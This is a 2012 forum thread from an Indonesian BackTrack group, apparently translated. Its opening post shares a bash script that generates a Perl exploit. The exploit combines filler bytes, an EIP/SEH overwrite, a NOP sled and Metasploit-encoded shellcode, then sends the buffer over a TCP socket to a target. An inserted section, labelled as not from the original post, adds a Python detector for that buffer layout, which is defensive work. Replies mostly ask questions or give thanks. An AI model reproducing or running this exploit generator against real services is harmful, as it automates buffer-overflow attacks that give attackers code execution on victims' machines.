Indonesian Back|Track Team
[Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - Printable Version



[Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - h3ll0s - 07-24-2012

This program is used to automatically exploit a program by sending via socket. However, before determining the exploit, you must know the EIP register that will be overwritten in order to determine the SEH handler.

Code:
#! /bin/bash
echo "Generate Automatic Exploit And Sending Bad Char Via Socket Perl"
echo "USAGE: ./createplexploit.sh [file]"
echo " "
echo "Header yang diinginkan?"
read header
echo "Berapa ukuran Bad Char?"
read junksize
echo "Register EIP yang akan di overwrite?"
read eip
echo "Berapa NOP yang akan dikirim?"
read nop
echo "Payload yang digunakan?"
read payload
echo "Encoder yang digunakan?"
read encoder
echo "Pilihan untuk mengunakan payload (anda harus tahu ini)"
read ploptions
echo "IP anda? (Say \$ARGV[0] to make it ask)"
read ip
echo "Port yang digunakan untuk megirim exploit? (Say \$ARGV[1] to make it ask)"
read port

echo "###################"
echo "# Sending Exploit #"
echo "#    Good Luck    #"
echo "#      h3ll0s     #"
echo "###################"
sleep 10

# Write out the Perl script that sends the exploit via socket
echo '#! /usr/bin/perl' > $1
echo 'use IO::Socket;' >> $1
echo "\$header = \"$header\";" >> $1
echo "\$junk = \"\\x41\" x $junksize;" >> $1
echo "\$eip = pack('V', $eip);" >> $1
echo "\$nop = \"\\x90\" x $nop;" >> $1
shellcode=`msfpayload $payload $ploptions EXITFUNC=seh R | msfencode -t perl -e $encoder | grep -e '"'`
echo "\$shellcode = $shellcode" >> $1
echo '$socket = IO::Socket::INET->new(' >> $1
echo 'Proto => "tcp",' >> $1
echo "PeerAddr => \"$ip\"," >> $1
echo "PeerPort => \"$port\"," >> $1
echo ');' >> $1
echo '$socket->recv($serverdata, 1024);' >> $1
echo 'print $serverdata;' >> $1
echo '$socket->send($header.$junk.$eip.$nop.$shellcode);' >> $1

echo "Selesai"
cat $1
chmod +x $1
echo "http://twitter.com/h3ll0s_c0de"

References:
Vulnserver And Ollydbg
OllyDbg Tricks for Exploit Development
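
The generated Perl script always sends the same layout: header, a run of filler bytes, a 4-byte overwrite value, a NOP sled, then the payload. As an added example (not part of the original post), this Python function flags that layout in a captured TCP payload for detection purposes; the thresholds, function names and sample bytes are assumptions constructed for illustration.

```python
from typing import Optional

# Thresholds are assumptions for illustration; tune them against real traffic.
MIN_FILLER = 64  # shortest run of one repeated byte treated as filler
MIN_SLED = 8     # shortest run of 0x90 treated as a NOP sled
NOP = 0x90

def run_length(data: bytes, start: int) -> int:
    """Length of the run of identical bytes beginning at start."""
    end = start
    while end < len(data) and data[end] == data[start]:
        end += 1
    return end - start

def find_overflow_layout(data: bytes) -> Optional[dict]:
    """Locate filler + 4-byte value + NOP sled; return offsets or None."""
    i = 0
    while i < len(data):
        run = run_length(data, i)
        if run >= MIN_FILLER:
            end = i + run
            # The 4-byte value may share leading bytes with the filler, so
            # the sled can begin anywhere from end to end + 4.
            for sled_at in range(end, min(end + 5, len(data))):
                if data[sled_at] == NOP and run_length(data, sled_at) >= MIN_SLED:
                    return {
                        "filler_offset": i,
                        "filler_len": sled_at - 4 - i,
                        "overwrite_value": data[sled_at - 4:sled_at].hex(),
                        "sled_offset": sled_at,
                        "sled_len": run_length(data, sled_at),
                    }
        i += run
    return None

# Constructed samples: placeholder header, 0xCC bytes standing in for a payload.
SUSPICIOUS = b"HDR " + b"A" * 2000 + bytes.fromhex("efbeadde") + b"\x90" * 16 + b"\xcc" * 32
BENIGN = b"GET /" + b"A" * 2000 + b" HTTP/1.1\r\n\r\n"

if __name__ == "__main__":
    print(find_overflow_layout(SUSPICIOUS))
    print(find_overflow_layout(BENIGN))
```

A long filler run alone is not flagged, which keeps padded but harmless requests such as the benign sample from alerting.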


RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - bee_os - 07-24-2012

Ouch, I don't get it, bro.. :sad:


RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - h3ll0s - 07-24-2012

(07-24-2012, 03:47 AM)bee_os Wrote: Ouch, I don't get it, bro.. :sad:

Actually it can be done without bash too, bro; only Perl is used.
It's hard, yeah; for this script you really have to learn first: what is an exploit?
How does a program run? What is a bad char?
After that, please study assembly and RE on your own :angry:


RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - Junior Riau - 07-24-2012

OllyDbg is for Oracle, isn't it?
Btw, nice share, bro hellos ^_^
How are you? Haven't seen you in a long time.


RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - Al - Ayyubi - 07-24-2012

As bro Juni said: OllyDbg is for Oracle, isn't it, bro? :smile:
It's similar, bro :smile:


RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - Junior Riau - 07-24-2012

Similar in what way?? I don't quite get it.


RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - rachmatasyary - 07-24-2012

Bro, how do you do it..... :angry::angry:


RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - xsan-lahci - 07-24-2012

This is a reverse engineering technique :biggrin: I have to learn from the basics first. Thanks for sharing, bro.


RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - iKONspirasi - 07-24-2012

Wow, someone here knows assembly :sungkem:

+1 from me for sharing it here :smile:


RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - h3ll0s - 07-26-2012

Learning debugging, executable form, fuzzing vulnerability, stack register, SEH, shellcode, and many more. Exploit development is not as easy as it looks.

Btw, thank you for the +1 from the admin :angel:

@vaisal: you miss me, don't you, bro #sepik

Can anyone help finish my exploit that was put on hold because Linux crashed? :badpc: